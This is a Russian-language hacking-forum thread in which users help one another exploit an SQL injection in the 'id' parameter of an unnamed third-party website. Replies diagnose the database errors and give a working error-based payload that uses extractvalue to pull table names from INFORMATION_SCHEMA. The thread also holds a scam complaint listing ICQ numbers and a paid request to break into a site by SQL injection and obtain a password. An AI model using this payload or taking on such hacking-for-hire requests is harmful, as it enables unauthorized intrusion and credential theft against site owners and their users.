Нужна помощь: есть сайт вида http://xxxx/?r=club/catalog/detail&id=12 при подстановки ковычки id=12' вылазит следующая ошибка: CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND date = 201703' at line 1 при попытки подобрать кол-во столбцов http://xxxx/?r=club/catalog/detail&id=12+order+by+1+--+ (или http://xxxx/?r=club/catalog/detail&id=12+order+by+1000+--+) появляется такая ошибка: CDbCommand не удалось исполнить SQL-запрос: SQLSTATE[42S22]: Column not found: 1054 Unknown column '1' in 'order clause' пробовал и - ставит впереди 12, и ковычку после 12 и делать запрос, всё равно не могу понять в чём проблема. Может кто подскажет, или как в SQLmape раскрутить, я так понял уязвимый параметр id.
Таргет в лс. А вообще смотри на саму ошибку где ругается. В первом случае потеряна кавычка у строки '' AND date = [Вот здесь]201703' или наоборот последняя лишняя Во втором случае оператор order by считает 1 текстовой строкой.
Как обычно полный РоС выслал в ЛС. А если кому интересно то решается еррор бэйседом в ордер бай. Code: site.ru/detail&id=-53 order by extractvalue(0x0a,concat(0x0a,(select TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA = database() LIMIT 1,1))) -- -
Суи уже отписал) На 500р кинул ICQ - 712024700 ICQ - 707394583 Со второй аськи написала примерно через час после первого, с историей что мы когда-то там общались и у него есть ахуенный товар Только он не учел что он был единственным с кем я там общался и никому этот контакт не давал)
Ищу специалиста, проверить сайт на уязвимость типа sql injection с последующим получением пароля $$$ пишите в личку
